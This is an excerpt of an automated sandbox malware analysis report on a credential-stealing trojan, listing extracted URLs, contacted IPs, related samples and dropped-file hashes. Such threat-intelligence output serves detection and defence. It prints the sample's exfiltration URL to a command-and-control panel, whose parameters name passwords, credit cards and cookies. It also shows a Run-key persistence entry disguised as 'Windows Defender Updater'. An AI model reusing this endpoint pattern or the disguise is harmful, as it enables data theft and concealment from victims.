                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E6121000.00000004.00000800.00020000.00000000.sdmp, update_232309.exe, 0000000B.00000002.355592092.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, update_232309.exe, 0000000C.00000002.390692319.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.sakkal.com5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://gomorrah.pw5VXh2VBmA0.exe, info.txt.0.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://panel.cheater-zone.com/logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFil5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.google.com/intl/en_uk/chrome/Google5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000131A9000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001313D000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.apache.org/licenses/LICENSE-2.05VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.fontbureau.com5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000003.355858128.00000176FEEB2000.00000004.00000020.00020000.00000000.sdmp, Chrome_History.txt.0.drfalse
                                                                      high
                                                                      https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001317F000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000131B6000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001314A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.google.com/instal5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.google.com/chrome?p=upda5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://support.google.5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013046000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://ip-api.comx5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E619F000.00000004.00000800.00020000.00000000.sdmp, update_232309.exe, 0000000B.00000002.355592092.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, update_232309.exe, 0000000C.00000002.390692319.0000000002D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://james.newtonking.com/projects/jsonNewtonsoft.Json.dll.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.carterandcone.coml5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://support.google.com/installer/?product=5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013165000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.375551818.00000176E62AE000.00000004.00000800.00020000.00000000.sdmp, Chrome_History.txt.0.drfalse
                                                                                    high
                                                                                    https://ac.ecosia.org/autocomplete?q=5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://search.yahoo.com?fr=crmas_sfp5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000013063000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.000000001301E000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130A8000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.fontbureau.com/designers/cabarga.htmlN5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.founder.com.cn/cn5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.fontbureau.com/designers/frere-jones.html5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://panel.cheater-zone.comx5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002D95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.jiyu-kobo.co.jp/5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.fontbureau.com/designers85VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs
                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                208.95.112.1
                                                                                                ip-api.comUnited States
                                                                                                53334TUT-ASUSfalse
                                                                                                92.249.45.113
                                                                                                panel.cheater-zone.comGermany
                                                                                                47583AS-HOSTINGERLTtrue
                                                                                                IP
                                                                                                192.168.2.1
                                                                                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                Analysis ID:790106
                                                                                                Start date and time:2023-01-23 21:23:58 +01:00
                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                Overall analysis duration:0h 10m 31s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Sample file name:5VXh2VBmA0 (renamed file extension from none to exe)
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                Number of analysed new started processes analysed:15
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • HDC enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.winEXE@5/11@16/3
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                HDC Information:Failed
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 91%
                                                                                                • Number of executed functions: 15
                                                                                                • Number of non-executed functions: 1
                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                TimeTypeDescription
                                                                                                21:24:59API Interceptor647x Sleep call for process: 5VXh2VBmA0.exe modified
                                                                                                21:25:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender Updater C:\Users\user\AppData\Local\Temp\update_232309.exe / start
                                                                                                21:25:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender Updater C:\Users\user\AppData\Local\Temp\update_232309.exe / start
                                                                                                21:25:25API Interceptor88x Sleep call for process: Zip.exe modified
                                                                                                21:25:26API Interceptor121x Sleep call for process: update_232309.exe modified
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                208.95.112.1sotema_4.txt.exeGet hashmaliciousBrowse
                                                                                                • ip-api.com/json/
                                                                                                Payment.exeGet hashmaliciousBrowse
                                                                                                • ip-api.com/json/
                                                                                                HEUR-Trojan.Win32.Crypt.gen-cd53d44c68b4b58f8.exeGet hashmaliciousBrowse
                                                                                                • ip-api.com/json/
                                                                                                Loader.exeGet hashmaliciousBrowse
                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                OTP BOT CRACKED.exeGet hashmaliciousBrowse
                                                                                                • ip-api.com/json/
                                                                                                taskshostw.exeGet hashmaliciousBrowse
                                                                                                • ip-api.com/csv/?fields=status,query
                                                                                                HLCUBO1221264815 Seaway BL.pdf (2).jarGet hashmaliciousBrowse
                                                                                                • ip-api.com/json/
                                                                                                7024Zc8v11Get hashmaliciousBrowse
                                                                                                • ip-api.com/json
                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                • ip-api.com/json/
                                                                                                O8Kj4Gefdt.exeGet hashmaliciousBrowse
                                                                                                • ip-api.com/json/?fields=countryCode
                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                Qp0NtYJBeV.exeGet hashmaliciousBrowse
                                                                                                • ip-api.com/json/
                                                                                                a7uQ6Sphe1.exeGet hashmaliciousBrowse
                                                                                                • ip-api.com/line/?fields=countryCode
                                                                                                HEUR-Trojan.Win32.Agent.gen-7a4df2fc82c0b553d.exeGet hashmaliciousBrowse
                                                                                                • ip-api.com/json/
                                                                                                hEPTms2Nq1.exeGet hashmaliciousBrowse
                                                                                                • ip-api.com/json
                                                                                                _IDEB_SCPRMO-1854705_230103_50592203.M1000827.PDF.exeGet hashmaliciousBrowse
                                                                                                • ip-api.com/line/?fields=hosting
                                                                                                Virus.htmlGet hashmaliciousBrowse
                                                                                                • ip-api.com/json/?fields=status,country,regionName,city,query
                                                                                                Virus.htmlGet hashmaliciousBrowse
                                                                                                • ip-api.com/json/?fields=status,country,regionName,city,query
                                                                                                Virus.htmlGet hashmaliciousBrowse
                                                                                                • ip-api.com/json/?fields=status,country,regionName,city,query
                                                                                                Virus.htmlGet hashmaliciousBrowse
                                                                                                • ip-api.com/json/?fields=status,country,regionName,city,query
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                ip-api.comsotema_4.txt.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                Payment.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                HEUR-Trojan.Win32.Crypt.gen-cd53d44c68b4b58f8.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                Audacity_x64_release.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                Audacity_x64_release.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                Loader.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                OTP BOT CRACKED.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                taskshostw.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                HLCUBO1221264815 Seaway BL.pdf (2).jarGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                O8Kj4Gefdt.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                Qp0NtYJBeV.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                a7uQ6Sphe1.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                HEUR-Trojan.Win32.Agent.gen-7a4df2fc82c0b553d.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                2c25b70f08a34cc52989882c4715854c4f488dacfa2c4.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                hEPTms2Nq1.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                _IDEB_SCPRMO-1854705_230103_50592203.M1000827.PDF.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                Virus.htmlGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                Virus.htmlGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                AS-HOSTINGERLTyC5aS5Mr35.exeGet hashmaliciousBrowse
                                                                                                • 31.220.106.55
                                                                                                Roominglists.exeGet hashmaliciousBrowse
                                                                                                • 2.57.90.16
                                                                                                UGF9G5Yeay.exeGet hashmaliciousBrowse
                                                                                                • 31.220.106.55
                                                                                                boJpCHgKfd.dllGet hashmaliciousBrowse
                                                                                                • 37.44.244.177
                                                                                                Remittance-Advice_cr92-Ef-01102023_pdf.htmGet hashmaliciousBrowse
                                                                                                • 93.188.166.128
                                                                                                INV80002-pdf-.exeGet hashmaliciousBrowse
                                                                                                • 2.57.90.16
                                                                                                SecuriteInfo.com.Trojan.GenericKD.65042030.19833.16095.exeGet hashmaliciousBrowse
                                                                                                • 2.57.90.16
                                                                                                SecuriteInfo.com.Win32.Evo-gen.15243.11743.exeGet hashmaliciousBrowse
                                                                                                • 2.57.90.16
                                                                                                N0pq5eqonB.dllGet hashmaliciousBrowse
                                                                                                • 37.44.244.177
                                                                                                N0pq5eqonB.dllGet hashmaliciousBrowse
                                                                                                • 37.44.244.177
                                                                                                npp.8.4.8.Installer.exeGet hashmaliciousBrowse
                                                                                                • 2.57.89.199
                                                                                                https://api.mixpanel.com/track?data=eyJldmVudCI6ICIkY2FtcGFpZ25fbGlua19jbGljayIsICJwcm9wZXJ0aWVzIjogeyJjYW1wYWlnbl9pZCI6IDYyMjAzNDQsICJkaXN0aW5jdF9pZCI6ICJkYWZmY2VjMS0zNWRjLTQ3OTItOThjYy03ODMzZjRjNGM1OGQiLCAibWVzc2FnZV9pZCI6IDE0MDAwOTIsICJ0b2tlbiI6ICJlMzlhMGE0MGQ0OWRmMWNlMjI4ZjBmMWEwNzUwNWVjNCIsICJ0eXBlIjogImVtYWlsIiwgInVybCI6ICJodHRwczovL2F1ZGlvbWFjay5jb20vd29ybGQvcG9zdC9ib3R3LTctMjcifX0%3D&redirect=http%3A%2F%2FlKQAvsjcDgURefXIthTZcbLzWSJGmQZTipzjwEPjsTSTYMwgKV.dudacestasepresentes.com.br?pid/bWF0dGhldy5zYWthaUBnbG9iYWxmb3VuZHJpZXMuY29tGet hashmaliciousBrowse
                                                                                                • 45.93.137.228
                                                                                                Enquiry.exeGet hashmaliciousBrowse
                                                                                                • 2.57.90.16
                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                • 31.220.54.148
                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                • 31.220.54.148
                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                • 31.220.54.148
                                                                                                PO102983459pdf.jsGet hashmaliciousBrowse
                                                                                                • 194.59.164.67
                                                                                                file.dllGet hashmaliciousBrowse
                                                                                                • 153.92.5.27
                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                • 2.57.90.16
                                                                                                https://mail.leaequity.info/?qngl&qrc=tsvetanka.savova@phillyshipyard.comGet hashmaliciousBrowse
                                                                                                • 45.132.240.86
                                                                                                TUT-ASUSfile.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                sotema_4.txt.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                Payment.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                HEUR-Trojan.Win32.Crypt.gen-cd53d44c68b4b58f8.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                Audacity_x64_release.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                Audacity_x64_release.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                Loader.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                OTP BOT CRACKED.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                taskshostw.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                HLCUBO1221264815 Seaway BL.pdf (2).jarGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                7024Zc8v11Get hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                O8Kj4Gefdt.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                Qp0NtYJBeV.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                a7uQ6Sphe1.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                HEUR-Trojan.Win32.Agent.gen-7a4df2fc82c0b553d.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                2c25b70f08a34cc52989882c4715854c4f488dacfa2c4.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                hEPTms2Nq1.exeGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                No context
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dllnwY3YpWQVx.exeGet hashmaliciousBrowse
                                                                                                  5SUx8Md4kq.exeGet hashmaliciousBrowse
                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                          NicDx0BvqP.exeGet hashmaliciousBrowse
                                                                                                            ngyoL1siem.exeGet hashmaliciousBrowse
                                                                                                              SecuriteInfo.com.Exploit.ShellCode.69.5295.22971.rtfGet hashmaliciousBrowse
                                                                                                                AvtoKomander_Installer.msiGet hashmaliciousBrowse
                                                                                                                  VFMPwzPWjM.exeGet hashmaliciousBrowse
                                                                                                                    CpLGtq4jBl.exeGet hashmaliciousBrowse
                                                                                                                      CpLGtq4jBl.exeGet hashmaliciousBrowse
                                                                                                                        5Qg0FFYoQd.exeGet hashmaliciousBrowse
                                                                                                                          IBK_Minervasoft.exeGet hashmaliciousBrowse
                                                                                                                            PO BNB Trends.exeGet hashmaliciousBrowse
                                                                                                                              Bm6U0Vj6pa.exeGet hashmaliciousBrowse
                                                                                                                                NEW REQUIREMENT..xlsxGet hashmaliciousBrowse
                                                                                                                                  kKEMJQNDL.exeGet hashmaliciousBrowse
                                                                                                                                    doc2022020909100101019.exeGet hashmaliciousBrowse
                                                                                                                                      hesaphareketi-01.pdf.exeGet hashmaliciousBrowse
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\Zip.exe
                                                                                                                                        File Type:CSV text
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):2343
                                                                                                                                        Entropy (8bit):5.374204171243879
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:MxHKEYHKGD8Ao6+vxpNl1qHGiD0HKeGitHTG1hAHKKPJAmHKoAPHZHpH+5HK+HKs:iqEYqGgAo9ZPlwmI0qertzG1eqKPJ/qo
                                                                                                                                        MD5:3F114A073575263E59307B55548FD5F4
                                                                                                                                        SHA1:971459D541646C4C6B382F06AAFA9F4147716568
                                                                                                                                        SHA-256:2417EC96E49CF7352D91892438478E961D8DC870FEB8E8821C732383CD9351F2
                                                                                                                                        SHA-512:EA7B613DF726F230ADFEF841E4C8A753228B3AFAE7F2D2FDC2704892910F18254F2D9B31AA5E7D4C993137BCAE92B0FF77D9D31503E96D605DBF0589E42AD809
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_6
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\update_232309.exe
                                                                                                                                        File Type:CSV text
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):2140
                                                                                                                                        Entropy (8bit):5.371730832466707
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:MxHKEYHKGD8Ao6+vxpNl1qHGiD0HKeGitHTG1hAHKKPJAmHKoAPHZHpH+Y:iqEYqGgAo9ZPlwmI0qertzG1eqKPJ/q3
                                                                                                                                        MD5:8D5284E805C10D2F4ABEEC24A26DDECA
                                                                                                                                        SHA1:22CC84B3067C6E457FAB34B7792E96AC3FA1E743
                                                                                                                                        SHA-256:760309005EBFE01DC4FCADAFE45DC919BFCB0C9EF08981671243C403DC8516D1
                                                                                                                                        SHA-512:CD1C073BC90984DB2A883857DF0649DDD41A6ECEAECC4068145FE30819305CD041E916304E08F33C74682E74CD3806F5B294E80601A35964F25B24B6A38047FE
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_6
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\Zip.exe
                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):791346
                                                                                                                                        Entropy (8bit):7.998032529446026
                                                                                                                                        Encrypted:true
                                                                                                                                        SSDEEP:12288:CTSR/lyfYR7akBh642W0C9RQJWnOP0+qfr4qAq3sE3Q1d8GAPJEqzdza+uarRFQB:B/lygpzW4x79oWntVUtglPJJhuar/Qr1
                                                                                                                                        MD5:757838030B3055850B3729F9AE38C3D4
                                                                                                                                        SHA1:4A2E8B84FEAC658DB711394410F54B604BE399F1
                                                                                                                                        SHA-256:35281414BF1B446C6716F0404181CF2551F145546CBF42833865DD8ED3BE979D
                                                                                                                                        SHA-512:FE4FDCFF4079AD4C6E9E1A343227E3464A18EF322F1B454BB57EA4A6EC4DCBFC4478B3100B9E90072361A0ECDB57A2AC436895D8542F2BA8CB24852DC5A0EAEC
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:low
